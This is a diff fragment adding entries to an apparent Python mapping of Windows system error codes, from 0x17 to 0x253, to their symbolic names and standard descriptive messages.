+ 0x00000017: ("ERROR_CRC", "Data error (cyclic redundancy check)."),
+ 0x00000018: ("ERROR_BAD_LENGTH", "The program issued a command but the command length is incorrect."),
+ 0x00000019: ("ERROR_SEEK", "The drive cannot locate a specific area or track on the disk."),
+ 0x0000001a: ("ERROR_NOT_DOS_DISK", "The specified disk or diskette cannot be accessed."),
+ 0x0000001b: ("ERROR_SECTOR_NOT_FOUND", "The drive cannot find the sector requested."),
+ 0x0000001c: ("ERROR_OUT_OF_PAPER", "The printer is out of paper."),
+ 0x0000001d: ("ERROR_WRITE_FAULT", "The system cannot write to the specified device."),
+ 0x0000001e: ("ERROR_READ_FAULT", "The system cannot read from the specified device."),
+ 0x0000001f: ("ERROR_GEN_FAILURE", "A device attached to the system is not functioning."),
+ 0x00000020: ("ERROR_SHARING_VIOLATION", "The process cannot access the file because it is being used by another process."),
+ 0x00000021: ("ERROR_LOCK_VIOLATION", "The process cannot access the file because another process has locked a portion of the file."),
+ 0x00000022: ("ERROR_WRONG_DISK", "The wrong diskette is in the drive."),
+ 0x00000024: ("ERROR_SHARING_BUFFER_EXCEEDED", "Too many files opened for sharing."),
+ 0x00000026: ("ERROR_HANDLE_EOF", "Reached the end of the file."),
+ 0x00000027: ("ERROR_HANDLE_DISK_FULL", "The disk is full."),
+ 0x00000032: ("ERROR_NOT_SUPPORTED", "The request is not supported."),
+ 0x00000033: ("ERROR_REM_NOT_LIST", "Windows cannot find the network path. Verify that the network path is correct and the destination computer is not busy or turned off. If Windows still cannot find the network path, contact your network administrator."),
+ 0x00000034: ("ERROR_DUP_NAME", "You were not connected because a duplicate name exists on the network. If joining a domain, go to System in Control Panel to change the computer name and try again. If joining a workgroup, choose another workgroup name."),
+ 0x00000035: ("ERROR_BAD_NETPATH", "The network path was not found."),
+ 0x00000036: ("ERROR_NETWORK_BUSY", "The network is busy."),
+ 0x00000037: ("ERROR_DEV_NOT_EXIST", "The specified network resource or device is no longer available."),
+ 0x00000038: ("ERROR_TOO_MANY_CMDS", "The network BIOS command limit has been reached."),
+ 0x00000039: ("ERROR_ADAP_HDW_ERR", "A network adapter hardware error occurred."),
+ 0x0000003a: ("ERROR_BAD_NET_RESP", "The specified server cannot perform the requested operation."),
+ 0x0000003b: ("ERROR_UNEXP_NET_ERR", "An unexpected network error occurred."),
+ 0x0000003c: ("ERROR_BAD_REM_ADAP", "The remote adapter is not compatible."),
+ 0x0000003d: ("ERROR_PRINTQ_FULL", "The printer queue is full."),
+ 0x0000003e: ("ERROR_NO_SPOOL_SPACE", "Space to store the file waiting to be printed is not available on the server."),
+ 0x0000003f: ("ERROR_PRINT_CANCELLED", "Your file waiting to be printed was deleted."),
+ 0x00000040: ("ERROR_NETNAME_DELETED", "The specified network name is no longer available."),
+ 0x00000041: ("ERROR_NETWORK_ACCESS_DENIED", "Network access is denied."),
+ 0x00000042: ("ERROR_BAD_DEV_TYPE", "The network resource type is not correct."),
+ 0x00000043: ("ERROR_BAD_NET_NAME", "The network name cannot be found."),
+ 0x00000044: ("ERROR_TOO_MANY_NAMES", "The name limit for the local computer network adapter card was exceeded."),
+ 0x00000045: ("ERROR_TOO_MANY_SESS", "The network BIOS session limit was exceeded."),
+ 0x00000046: ("ERROR_SHARING_PAUSED", "The remote server has been paused or is in the process of being started."),
+ 0x00000047: ("ERROR_REQ_NOT_ACCEP", "No more connections can be made to this remote computer at this time because there are already as many connections as the computer can accept."),
+ 0x00000048: ("ERROR_REDIR_PAUSED", "The specified printer or disk device has been paused."),
+ 0x00000050: ("ERROR_FILE_EXISTS", "The file exists."),
+ 0x00000052: ("ERROR_CANNOT_MAKE", "The directory or file cannot be created."),
+ 0x00000053: ("ERROR_FAIL_I24", "Fail on INT 24."),
+ 0x00000054: ("ERROR_OUT_OF_STRUCTURES", "Storage to process this request is not available."),
+ 0x00000055: ("ERROR_ALREADY_ASSIGNED", "The local device name is already in use."),
+ 0x00000056: ("ERROR_INVALID_PASSWORD", "The specified network password is not correct."),
+ 0x00000057: ("ERROR_INVALID_PARAMETER", "The parameter is incorrect."),
+ 0x00000058: ("ERROR_NET_WRITE_FAULT", "A write fault occurred on the network."),
+ 0x00000059: ("ERROR_NO_PROC_SLOTS", "The system cannot start another process at this time."),
+ 0x00000064: ("ERROR_TOO_MANY_SEMAPHORES", "Cannot create another system semaphore."),
+ 0x00000065: ("ERROR_EXCL_SEM_ALREADY_OWNED", "The exclusive semaphore is owned by another process."),
+ 0x00000066: ("ERROR_SEM_IS_SET", "The semaphore is set and cannot be closed."),
+ 0x00000067: ("ERROR_TOO_MANY_SEM_REQUESTS", "The semaphore cannot be set again."),
+ 0x00000068: ("ERROR_INVALID_AT_INTERRUPT_TIME", "Cannot request exclusive semaphores at interrupt time."),
+ 0x00000069: ("ERROR_SEM_OWNER_DIED", "The previous ownership of this semaphore has ended."),
+ 0x0000006a: ("ERROR_SEM_USER_LIMIT", "Insert the diskette for drive %1."),
+ 0x0000006b: ("ERROR_DISK_CHANGE", "The program stopped because an alternate diskette was not inserted."),
+ 0x0000006c: ("ERROR_DRIVE_LOCKED", "The disk is in use or locked by another process."),
+ 0x0000006d: ("ERROR_BROKEN_PIPE", "The pipe has been ended."),
+ 0x0000006e: ("ERROR_OPEN_FAILED", "The system cannot open the device or file specified."),
+ 0x0000006f: ("ERROR_BUFFER_OVERFLOW", "The file name is too long."),
+ 0x00000070: ("ERROR_DISK_FULL", "There is not enough space on the disk."),
+ 0x00000071: ("ERROR_NO_MORE_SEARCH_HANDLES", "No more internal file identifiers available."),
+ 0x00000072: ("ERROR_INVALID_TARGET_HANDLE", "The target internal file identifier is incorrect."),
+ 0x00000075: ("ERROR_INVALID_CATEGORY", "The IOCTL call made by the application program is not correct."),
+ 0x00000076: ("ERROR_INVALID_VERIFY_SWITCH", "The verify-on-write switch parameter value is not correct."),
+ 0x00000077: ("ERROR_BAD_DRIVER_LEVEL", "The system does not support the command requested."),
+ 0x00000078: ("ERROR_CALL_NOT_IMPLEMENTED", "This function is not supported on this system."),
+ 0x00000079: ("ERROR_SEM_TIMEOUT", "The semaphore timeout period has expired."),
+ 0x0000007a: ("ERROR_INSUFFICIENT_BUFFER", "The data area passed to a system call is too small."),
+ 0x0000007b: ("ERROR_INVALID_NAME", "The filename, directory name, or volume label syntax is incorrect."),
+ 0x0000007c: ("ERROR_INVALID_LEVEL", "The system call level is not correct."),
+ 0x0000007d: ("ERROR_NO_VOLUME_LABEL", "The disk has no volume label."),
+ 0x0000007e: ("ERROR_MOD_NOT_FOUND", "The specified module could not be found."),
+ 0x0000007f: ("ERROR_PROC_NOT_FOUND", "The specified procedure could not be found."),
+ 0x00000080: ("ERROR_WAIT_NO_CHILDREN", "There are no child processes to wait for."),
+ 0x00000081: ("ERROR_CHILD_NOT_COMPLETE", "The %1 application cannot be run in Win32 mode."),
+ 0x00000082: ("ERROR_DIRECT_ACCESS_HANDLE", "Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O."),
+ 0x00000083: ("ERROR_NEGATIVE_SEEK", "An attempt was made to move the file pointer before the beginning of the file."),
+ 0x00000084: ("ERROR_SEEK_ON_DEVICE", "The file pointer cannot be set on the specified device or file."),
+ 0x00000085: ("ERROR_IS_JOIN_TARGET", "A JOIN or SUBST command cannot be used for a drive that contains previously joined drives."),
+ 0x00000086: ("ERROR_IS_JOINED", "An attempt was made to use a JOIN or SUBST command on a drive that has already been joined."),
+ 0x00000087: ("ERROR_IS_SUBSTED", "An attempt was made to use a JOIN or SUBST command on a drive that has already been substituted."),
+ 0x00000088: ("ERROR_NOT_JOINED", "The system tried to delete the JOIN of a drive that is not joined."),
+ 0x00000089: ("ERROR_NOT_SUBSTED", "The system tried to delete the substitution of a drive that is not substituted."),
+ 0x0000008a: ("ERROR_JOIN_TO_JOIN", "The system tried to join a drive to a directory on a joined drive."),
+ 0x0000008b: ("ERROR_SUBST_TO_SUBST", "The system tried to substitute a drive to a directory on a substituted drive."),
+ 0x0000008c: ("ERROR_JOIN_TO_SUBST", "The system tried to join a drive to a directory on a substituted drive."),
+ 0x0000008d: ("ERROR_SUBST_TO_JOIN", "The system tried to SUBST a drive to a directory on a joined drive."),
+ 0x0000008e: ("ERROR_BUSY_DRIVE", "The system cannot perform a JOIN or SUBST at this time."),
+ 0x0000008f: ("ERROR_SAME_DRIVE", "The system cannot join or substitute a drive to or for a directory on the same drive."),
+ 0x00000090: ("ERROR_DIR_NOT_ROOT", "The directory is not a subdirectory of the root directory."),
+ 0x00000091: ("ERROR_DIR_NOT_EMPTY", "The directory is not empty."),
+ 0x00000092: ("ERROR_IS_SUBST_PATH", "The path specified is being used in a substitute."),
+ 0x00000093: ("ERROR_IS_JOIN_PATH", "Not enough resources are available to process this command."),
+ 0x00000094: ("ERROR_PATH_BUSY", "The path specified cannot be used at this time."),
+ 0x00000095: ("ERROR_IS_SUBST_TARGET", "An attempt was made to join or substitute a drive for which a directory on the drive is the target of a previous substitute."),
+ 0x00000096: ("ERROR_SYSTEM_TRACE", "System trace information was not specified in your CONFIG.SYS file, or tracing is disallowed."),
+ 0x00000097: ("ERROR_INVALID_EVENT_COUNT", "The number of specified semaphore events for DosMuxSemWait is not correct."),
+ 0x00000098: ("ERROR_TOO_MANY_MUXWAITERS", "DosMuxSemWait did not execute; too many semaphores are already set."),
+ 0x00000099: ("ERROR_INVALID_LIST_FORMAT", "The DosMuxSemWait list is not correct."),
+ 0x0000009a: ("ERROR_LABEL_TOO_LONG", "The volume label you entered exceeds the label character limit of the target file system."),
+ 0x0000009b: ("ERROR_TOO_MANY_TCBS", "Cannot create another thread."),
+ 0x0000009c: ("ERROR_SIGNAL_REFUSED", "The recipient process has refused the signal."),
+ 0x0000009d: ("ERROR_DISCARDED", "The segment is already discarded and cannot be locked."),
+ 0x0000009e: ("ERROR_NOT_LOCKED", "The segment is already unlocked."),
+ 0x0000009f: ("ERROR_BAD_THREADID_ADDR", "The address for the thread ID is not correct."),
+ 0x000000a0: ("ERROR_BAD_ARGUMENTS", "One or more arguments are not correct."),
+ 0x000000a1: ("ERROR_BAD_PATHNAME", "The specified path is invalid."),
+ 0x000000a2: ("ERROR_SIGNAL_PENDING", "A signal is already pending."),
+ 0x000000a4: ("ERROR_MAX_THRDS_REACHED", "No more threads can be created in the system."),
+ 0x000000a7: ("ERROR_LOCK_FAILED", "Unable to lock a region of a file."),
+ 0x000000aa: ("ERROR_BUSY", "The requested resource is in use."),
+ 0x000000ab: ("ERROR_DEVICE_SUPPORT_IN_PROGRESS", "Device's command support detection is in progress."),
+ 0x000000ad: ("ERROR_CANCEL_VIOLATION", "A lock request was not outstanding for the supplied cancel region."),
+ 0x000000ae: ("ERROR_ATOMIC_LOCKS_NOT_SUPPORTED", "The file system does not support atomic changes to the lock type."),
+ 0x000000b4: ("ERROR_INVALID_SEGMENT_NUMBER", "The system detected a segment number that was not correct."),
+ 0x000000b6: ("ERROR_INVALID_ORDINAL", "The operating system cannot run %1."),
+ 0x000000b7: ("ERROR_ALREADY_EXISTS", "Cannot create a file when that file already exists."),
+ 0x000000ba: ("ERROR_INVALID_FLAG_NUMBER", "The flag passed is not correct."),
+ 0x000000bb: ("ERROR_SEM_NOT_FOUND", "The specified system semaphore name was not found."),
+ 0x000000bc: ("ERROR_INVALID_STARTING_CODESEG", "The operating system cannot run %1."),
+ 0x000000bd: ("ERROR_INVALID_STACKSEG", "The operating system cannot run %1."),
+ 0x000000be: ("ERROR_INVALID_MODULETYPE", "The operating system cannot run %1."),
+ 0x000000bf: ("ERROR_INVALID_EXE_SIGNATURE", "Cannot run %1 in Win32 mode."),
+ 0x000000c0: ("ERROR_EXE_MARKED_INVALID", "The operating system cannot run %1."),
+ 0x000000c1: ("ERROR_BAD_EXE_FORMAT", "%1 is not a valid Win32 application."),
+ 0x000000c2: ("ERROR_ITERATED_DATA_EXCEEDS_64k", "The operating system cannot run %1."),
+ 0x000000c3: ("ERROR_INVALID_MINALLOCSIZE", "The operating system cannot run %1."),
+ 0x000000c4: ("ERROR_DYNLINK_FROM_INVALID_RING", "The operating system cannot run this application program."),
+ 0x000000c5: ("ERROR_IOPL_NOT_ENABLED", "The operating system is not presently configured to run this application."),
+ 0x000000c6: ("ERROR_INVALID_SEGDPL", "The operating system cannot run %1."),
+ 0x000000c7: ("ERROR_AUTODATASEG_EXCEEDS_64k", "The operating system cannot run this application program."),
+ 0x000000c8: ("ERROR_RING2SEG_MUST_BE_MOVABLE", "The code segment cannot be greater than or equal to 64K."),
+ 0x000000c9: ("ERROR_RELOC_CHAIN_XEEDS_SEGLIM", "The operating system cannot run %1."),
+ 0x000000ca: ("ERROR_INFLOOP_IN_RELOC_CHAIN", "The operating system cannot run %1."),
+ 0x000000cb: ("ERROR_ENVVAR_NOT_FOUND", "The system could not find the environment option that was entered."),
+ 0x000000cd: ("ERROR_NO_SIGNAL_SENT", "No process in the command subtree has a signal handler."),
+ 0x000000ce: ("ERROR_FILENAME_EXCED_RANGE", "The filename or extension is too long."),
+ 0x000000cf: ("ERROR_RING2_STACK_IN_USE", "The ring 2 stack is in use."),
+ 0x000000d0: ("ERROR_META_EXPANSION_TOO_LONG", "The global filename characters, * or ?, are entered incorrectly or too many global filename characters are specified."),
+ 0x000000d1: ("ERROR_INVALID_SIGNAL_NUMBER", "The signal being posted is not correct."),
+ 0x000000d2: ("ERROR_THREAD_1_INACTIVE", "The signal handler cannot be set."),
+ 0x000000d4: ("ERROR_LOCKED", "The segment is locked and cannot be reallocated."),
+ 0x000000d6: ("ERROR_TOO_MANY_MODULES", "Too many dynamic-link modules are attached to this program or dynamic-link module."),
+ 0x000000d7: ("ERROR_NESTING_NOT_ALLOWED", "Cannot nest calls to LoadModule."),
+ 0x000000d8: ("ERROR_EXE_MACHINE_TYPE_MISMATCH", "This version of %1 is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher."),
+ 0x000000d9: ("ERROR_EXE_CANNOT_MODIFY_SIGNED_BINARY", "The image file %1 is signed, unable to modify."),
+ 0x000000da: ("ERROR_EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY", "The image file %1 is strong signed, unable to modify."),
+ 0x000000dc: ("ERROR_FILE_CHECKED_OUT", "This file is checked out or locked for editing by another user."),
+ 0x000000dd: ("ERROR_CHECKOUT_REQUIRED", "The file must be checked out before saving changes."),
+ 0x000000de: ("ERROR_BAD_FILE_TYPE", "The file type being saved or retrieved has been blocked."),
+ 0x000000df: ("ERROR_FILE_TOO_LARGE", "The file size exceeds the limit allowed and cannot be saved."),
+ 0x000000e0: ("ERROR_FORMS_AUTH_REQUIRED", "Access Denied. Before opening files in this location, you must first add the web site to your trusted sites list, browse to the web site, and select the option to login automatically."),
+ 0x000000e1: ("ERROR_VIRUS_INFECTED", "Operation did not complete successfully because the file contains a virus or potentially unwanted software."),
+ 0x000000e2: ("ERROR_VIRUS_DELETED", "This file contains a virus or potentially unwanted software and cannot be opened. Due to the nature of this virus or potentially unwanted software, the file has been removed from this location."),
+ 0x000000e5: ("ERROR_PIPE_LOCAL", "The pipe is local."),
+ 0x000000e6: ("ERROR_BAD_PIPE", "The pipe state is invalid."),
+ 0x000000e7: ("ERROR_PIPE_BUSY", "All pipe instances are busy."),
+ 0x000000e8: ("ERROR_NO_DATA", "The pipe is being closed."),
+ 0x000000e9: ("ERROR_PIPE_NOT_CONNECTED", "No process is on the other end of the pipe."),
+ 0x000000ea: ("ERROR_MORE_DATA", "More data is available."),
+ 0x000000f0: ("ERROR_VC_DISCONNECTED", "The session was canceled."),
+ 0x000000fe: ("ERROR_INVALID_EA_NAME", "The specified extended attribute name was invalid."),
+ 0x000000ff: ("ERROR_EA_LIST_INCONSISTENT", "The extended attributes are inconsistent."),
+ 0x00000102: ("WAIT_TIMEOUT", "The wait operation timed out."),
+ 0x00000103: ("ERROR_NO_MORE_ITEMS", "No more data is available."),
+ 0x0000010a: ("ERROR_CANNOT_COPY", "The copy functions cannot be used."),
+ 0x0000010b: ("ERROR_DIRECTORY", "The directory name is invalid."),
+ 0x00000113: ("ERROR_EAS_DIDNT_FIT", "The extended attributes did not fit in the buffer."),
+ 0x00000114: ("ERROR_EA_FILE_CORRUPT", "The extended attribute file on the mounted file system is corrupt."),
+ 0x00000115: ("ERROR_EA_TABLE_FULL", "The extended attribute table file is full."),
+ 0x00000116: ("ERROR_INVALID_EA_HANDLE", "The specified extended attribute handle is invalid."),
+ 0x0000011a: ("ERROR_EAS_NOT_SUPPORTED", "The mounted file system does not support extended attributes."),
+ 0x00000120: ("ERROR_NOT_OWNER", "Attempt to release mutex not owned by caller."),
+ 0x0000012a: ("ERROR_TOO_MANY_POSTS", "Too many posts were made to a semaphore."),
+ 0x0000012b: ("ERROR_PARTIAL_COPY", "Only part of a ReadProcessMemory or WriteProcessMemory request was completed."),
+ 0x0000012c: ("ERROR_OPLOCK_NOT_GRANTED", "The oplock request is denied."),
+ 0x0000012d: ("ERROR_INVALID_OPLOCK_PROTOCOL", "An invalid oplock acknowledgment was received by the system."),
+ 0x0000012e: ("ERROR_DISK_TOO_FRAGMENTED", "The volume is too fragmented to complete this operation."),
+ 0x0000012f: ("ERROR_DELETE_PENDING", "The file cannot be opened because it is in the process of being deleted."),
+ 0x00000130: ("ERROR_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING", "Short name settings may not be changed on this volume due to the global registry setting."),
+ 0x00000131: ("ERROR_SHORT_NAMES_NOT_ENABLED_ON_VOLUME", "Short names are not enabled on this volume."),
+ 0x00000132: ("ERROR_SECURITY_STREAM_IS_INCONSISTENT", "The security stream for the given volume is in an inconsistent state."),
+ 0x00000133: ("ERROR_INVALID_LOCK_RANGE", "A requested file lock operation cannot be processed due to an invalid byte range."),
+ 0x00000134: ("ERROR_IMAGE_SUBSYSTEM_NOT_PRESENT", "The subsystem needed to support the image type is not present."),
+ 0x00000135: ("ERROR_NOTIFICATION_GUID_ALREADY_DEFINED", "The specified file already has a notification GUID associated with it."),
+ 0x00000136: ("ERROR_INVALID_EXCEPTION_HANDLER", "An invalid exception handler routine has been detected."),
+ 0x00000137: ("ERROR_DUPLICATE_PRIVILEGES", "Duplicate privileges were specified for the token."),
+ 0x00000138: ("ERROR_NO_RANGES_PROCESSED", "No ranges for the specified operation were able to be processed."),
+ 0x00000139: ("ERROR_NOT_ALLOWED_ON_SYSTEM_FILE", "Operation is not allowed on a file system internal file."),
+ 0x0000013a: ("ERROR_DISK_RESOURCES_EXHAUSTED", "The physical resources of this disk have been exhausted."),
+ 0x0000013b: ("ERROR_INVALID_TOKEN", "The token representing the data is invalid."),
+ 0x0000013c: ("ERROR_DEVICE_FEATURE_NOT_SUPPORTED", "The device does not support the command feature."),
+ 0x0000013d: ("ERROR_MR_MID_NOT_FOUND", "The system cannot find message text for message number 0x%1 in the message file for %2."),
+ 0x0000013e: ("ERROR_SCOPE_NOT_FOUND", "The scope specified was not found."),
+ 0x0000013f: ("ERROR_UNDEFINED_SCOPE", "The Central Access Policy specified is not defined on the target machine."),
+ 0x00000140: ("ERROR_INVALID_CAP", "The Central Access Policy obtained from Active Directory is invalid."),
+ 0x00000141: ("ERROR_DEVICE_UNREACHABLE", "The device is unreachable."),
+ 0x00000142: ("ERROR_DEVICE_NO_RESOURCES", "The target device has insufficient resources to complete the operation."),
+ 0x00000143: ("ERROR_DATA_CHECKSUM_ERROR", "A data integrity checksum error occurred. Data in the file stream is corrupt."),
+ 0x00000144: ("ERROR_INTERMIXED_KERNEL_EA_OPERATION", "An attempt was made to modify both a KERNEL and normal Extended Attribute (EA) in the same operation."),
+ 0x00000146: ("ERROR_FILE_LEVEL_TRIM_NOT_SUPPORTED", "Device does not support file-level TRIM."),
+ 0x00000147: ("ERROR_OFFSET_ALIGNMENT_VIOLATION", "The command specified a data offset that does not align to the device's granularity/alignment."),
+ 0x00000148: ("ERROR_INVALID_FIELD_IN_PARAMETER_LIST", "The command specified an invalid field in its parameter list."),
+ 0x00000149: ("ERROR_OPERATION_IN_PROGRESS", "An operation is currently in progress with the device."),
+ 0x0000014a: ("ERROR_BAD_DEVICE_PATH", "An attempt was made to send down the command via an invalid path to the target device."),
+ 0x0000014b: ("ERROR_TOO_MANY_DESCRIPTORS", "The command specified a number of descriptors that exceeded the maximum supported by the device."),
+ 0x0000014c: ("ERROR_SCRUB_DATA_DISABLED", "Scrub is disabled on the specified file."),
+ 0x0000014d: ("ERROR_NOT_REDUNDANT_STORAGE", "The storage device does not provide redundancy."),
+ 0x0000014e: ("ERROR_RESIDENT_FILE_NOT_SUPPORTED", "An operation is not supported on a resident file."),
+ 0x0000014f: ("ERROR_COMPRESSED_FILE_NOT_SUPPORTED", "An operation is not supported on a compressed file."),
+ 0x00000150: ("ERROR_DIRECTORY_NOT_SUPPORTED", "An operation is not supported on a directory."),
+ 0x00000151: ("ERROR_NOT_READ_FROM_COPY", "The specified copy of the requested data could not be read."),
+ 0x00000152: ("ERROR_FT_WRITE_FAILURE", "The specified data could not be written to any of the copies."),
+ 0x00000153: ("ERROR_FT_DI_SCAN_REQUIRED", "One or more copies of data on this device may be out of sync. No writes may be performed until a data integrity scan is completed."),
+ 0x00000154: ("ERROR_INVALID_KERNEL_INFO_VERSION", "The supplied kernel information version is invalid."),
+ 0x00000155: ("ERROR_INVALID_PEP_INFO_VERSION", "The supplied PEP information version is invalid."),
+ 0x0000015e: ("ERROR_FAIL_NOACTION_REBOOT", "No action was taken as a system reboot is required."),
+ 0x0000015f: ("ERROR_FAIL_SHUTDOWN", "The shutdown operation failed."),
+ 0x00000160: ("ERROR_FAIL_RESTART", "The restart operation failed."),
+ 0x00000161: ("ERROR_MAX_SESSIONS_REACHED", "The maximum number of sessions has been reached."),
+ 0x00000190: ("ERROR_THREAD_MODE_ALREADY_BACKGROUND", "The thread is already in background processing mode."),
+ 0x00000191: ("ERROR_THREAD_MODE_NOT_BACKGROUND", "The thread is not in background processing mode."),
+ 0x00000192: ("ERROR_PROCESS_MODE_ALREADY_BACKGROUND", "The process is already in background processing mode."),
+ 0x00000193: ("ERROR_PROCESS_MODE_NOT_BACKGROUND", "The process is not in background processing mode."),
+ 0x000001e7: ("ERROR_INVALID_ADDRESS", "Attempt to access invalid address."),
+ 0x000001f4: ("ERROR_USER_PROFILE_LOAD", "User profile cannot be loaded."),
+ 0x00000216: ("ERROR_ARITHMETIC_OVERFLOW", "Arithmetic result exceeded 32 bits."),
+ 0x00000217: ("ERROR_PIPE_CONNECTED", "There is a process on other end of the pipe."),
+ 0x00000218: ("ERROR_PIPE_LISTENING", "Waiting for a process to open the other end of the pipe."),
+ 0x00000219: ("ERROR_VERIFIER_STOP", "Application verifier has found an error in the current process."),
+ 0x0000021a: ("ERROR_ABIOS_ERROR", "An error occurred in the ABIOS subsystem."),
+ 0x0000021b: ("ERROR_WX86_WARNING", "A warning occurred in the WX86 subsystem."),
+ 0x0000021c: ("ERROR_WX86_ERROR", "An error occurred in the WX86 subsystem."),
+ 0x0000021d: ("ERROR_TIMER_NOT_CANCELED", "An attempt was made to cancel or set a timer that has an associated APC and the subject thread is not the thread that originally set the timer with an associated APC routine."),
+ 0x0000021e: ("ERROR_UNWIND", "Unwind exception code."),
+ 0x0000021f: ("ERROR_BAD_STACK", "An invalid or unaligned stack was encountered during an unwind operation."),
+ 0x00000220: ("ERROR_INVALID_UNWIND_TARGET", "An invalid unwind target was encountered during an unwind operation."),
+ 0x00000221: ("ERROR_INVALID_PORT_ATTRIBUTES", "Invalid Object Attributes specified to NtCreatePort or invalid Port Attributes specified to NtConnectPort"),
+ 0x00000222: ("ERROR_PORT_MESSAGE_TOO_LONG", "Length of message passed to NtRequestPort or NtRequestWaitReplyPort was longer than the maximum message allowed by the port."),
+ 0x00000223: ("ERROR_INVALID_QUOTA_LOWER", "An attempt was made to lower a quota limit below the current usage."),
+ 0x00000224: ("ERROR_DEVICE_ALREADY_ATTACHED", "An attempt was made to attach to a device that was already attached to another device."),
+ 0x00000225: ("ERROR_INSTRUCTION_MISALIGNMENT", "An attempt was made to execute an instruction at an unaligned address and the host system does not support unaligned instruction references."),
+ 0x00000226: ("ERROR_PROFILING_NOT_STARTED", "Profiling not started."),
+ 0x00000227: ("ERROR_PROFILING_NOT_STOPPED", "Profiling not stopped."),
+ 0x00000228: ("ERROR_COULD_NOT_INTERPRET", "The passed ACL did not contain the minimum required information."),
+ 0x00000229: ("ERROR_PROFILING_AT_LIMIT", "The number of active profiling objects is at the maximum and no more may be started."),
+ 0x0000022a: ("ERROR_CANT_WAIT", "Used to indicate that an operation cannot continue without blocking for I/O."),
+ 0x0000022b: ("ERROR_CANT_TERMINATE_SELF", "Indicates that a thread attempted to terminate itself by default (called NtTerminateThread with NULL) and it was the last thread in the current process."),
+ 0x0000022c: ("ERROR_UNEXPECTED_MM_CREATE_ERR", "If an MM error is returned which is not defined in the standard FsRtl filter, it is converted to one of the following errors which is guaranteed to be in the filter."),
+ 0x0000022d: ("ERROR_UNEXPECTED_MM_MAP_ERROR", "If an MM error is returned which is not defined in the standard FsRtl filter, it is converted to one of the following errors which is guaranteed to be in the filter."),
+ 0x0000022e: ("ERROR_UNEXPECTED_MM_EXTEND_ERR", "If an MM error is returned which is not defined in the standard FsRtl filter, it is converted to one of the following errors which is guaranteed to be in the filter."),
+ 0x0000022f: ("ERROR_BAD_FUNCTION_TABLE", "A malformed function table was encountered during an unwind operation."),
+ 0x00000230: ("ERROR_NO_GUID_TRANSLATION", "Indicates that an attempt was made to assign protection to a file system file or directory and one of the SIDs in the security descriptor could not be translated into a GUID that could be stored by the file system."),
+ 0x00000231: ("ERROR_INVALID_LDT_SIZE", "Indicates that an attempt was made to grow an LDT by setting its size, or that the size was not an even number of selectors."),
+ 0x00000233: ("ERROR_INVALID_LDT_OFFSET", "Indicates that the starting value for the LDT information was not an integral multiple of the selector size."),
+ 0x00000234: ("ERROR_INVALID_LDT_DESCRIPTOR", "Indicates that the user supplied an invalid descriptor when trying to set up Ldt descriptors."),
+ 0x00000235: ("ERROR_TOO_MANY_THREADS", "Indicates a process has too many threads to perform the requested action. For example, assignment of a primary token may only be performed when a process has zero or one threads."),
+ 0x00000236: ("ERROR_THREAD_NOT_IN_PROCESS", "An attempt was made to operate on a thread within a specific process, but the thread specified is not in the process specified."),
+ 0x00000237: ("ERROR_PAGEFILE_QUOTA_EXCEEDED", "Page file quota was exceeded."),
+ 0x00000238: ("ERROR_LOGON_SERVER_CONFLICT", "The Netlogon service cannot start because another Netlogon service running in the domain conflicts with the specified role."),
+ 0x00000239: ("ERROR_SYNCHRONIZATION_REQUIRED", "The SAM database on a Windows Server is significantly out of synchronization with the copy on the Domain Controller. A complete synchronization is required."),
+ 0x0000023a: ("ERROR_NET_OPEN_FAILED", "The NtCreateFile API failed. This error should never be returned to an application, it is a place holder for the Windows Lan Manager Redirector to use in its internal error mapping routines."),
+ 0x0000023b: ("ERROR_IO_PRIVILEGE_FAILED", "{Privilege Failed}"),
+ 0x0000023c: ("ERROR_CONTROL_C_EXIT", "{Application Exit by CTRL+C}"),
+ 0x0000023d: ("ERROR_MISSING_SYSTEMFILE", "{Missing System File}"),
+ 0x0000023e: ("ERROR_UNHANDLED_EXCEPTION", "{Application Error}"),
+ 0x0000023f: ("ERROR_APP_INIT_FAILURE", "{Application Error}"),
+ 0x00000240: ("ERROR_PAGEFILE_CREATE_FAILED", "{Unable to Create Paging File}"),
+ 0x00000241: ("ERROR_INVALID_IMAGE_HASH", "Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source."),
+ 0x00000242: ("ERROR_NO_PAGEFILE", "{No Paging File Specified}"),
+ 0x00000243: ("ERROR_ILLEGAL_FLOAT_CONTEXT", "{EXCEPTION}"),
+ 0x00000244: ("ERROR_NO_EVENT_PAIR", "An event pair synchronization operation was performed using the thread specific client/server event pair object, but no event pair object was associated with the thread."),
+ 0x00000245: ("ERROR_DOMAIN_CTRLR_CONFIG_ERROR", "A Windows Server has an incorrect configuration."),
+ 0x00000246: ("ERROR_ILLEGAL_CHARACTER", "An illegal character was encountered. For a multi-byte character set this includes a lead byte without a succeeding trail byte. For the Unicode character set this includes the characters 0xFFFF and 0xFFFE."),
+ 0x00000247: ("ERROR_UNDEFINED_CHARACTER", "The Unicode character is not defined in the Unicode character set installed on the system."),
+ 0x00000248: ("ERROR_FLOPPY_VOLUME", "The paging file cannot be created on a floppy diskette."),
+ 0x00000249: ("ERROR_BIOS_FAILED_TO_CONNECT_INTERRUPT", "The system BIOS failed to connect a system interrupt to the device or bus for which the device is connected."),
+ 0x0000024a: ("ERROR_BACKUP_CONTROLLER", "This operation is only allowed for the Primary Domain Controller of the domain."),
+ 0x0000024b: ("ERROR_MUTANT_LIMIT_EXCEEDED", "An attempt was made to acquire a mutant such that its maximum count would have been exceeded."),
+ 0x0000024c: ("ERROR_FS_DRIVER_REQUIRED", "A volume has been accessed for which a file system driver is required that has not yet been loaded."),
+ 0x0000024d: ("ERROR_CANNOT_LOAD_REGISTRY_FILE", "{Registry File Failure}"),
+ 0x0000024e: ("ERROR_DEBUG_ATTACH_FAILED", "{Unexpected Failure in DebugActiveProcess}"),
+ 0x0000024f: ("ERROR_SYSTEM_PROCESS_TERMINATED", "{Fatal System Error}"),
+ 0x00000250: ("ERROR_DATA_NOT_ACCEPTED", "{Data Not Accepted}"),
+ 0x00000251: ("ERROR_VDM_HARD_ERROR", "NTVDM encountered a hard error."),
+ 0x00000252: ("ERROR_DRIVER_CANCEL_TIMEOUT", "{Cancel Timeout}"),
+ 0x00000253: ("ERROR_REPLY_MESSAGE_MISMATCH", "{Reply Message Mismatch}"),
